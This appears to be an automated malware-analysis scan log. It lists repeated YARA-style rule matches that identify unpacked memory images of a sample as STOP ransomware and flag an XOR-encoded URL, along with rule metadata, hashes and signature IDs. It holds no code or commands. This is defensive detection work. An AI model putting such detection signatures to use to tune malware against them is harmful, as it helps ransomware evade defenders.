Source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
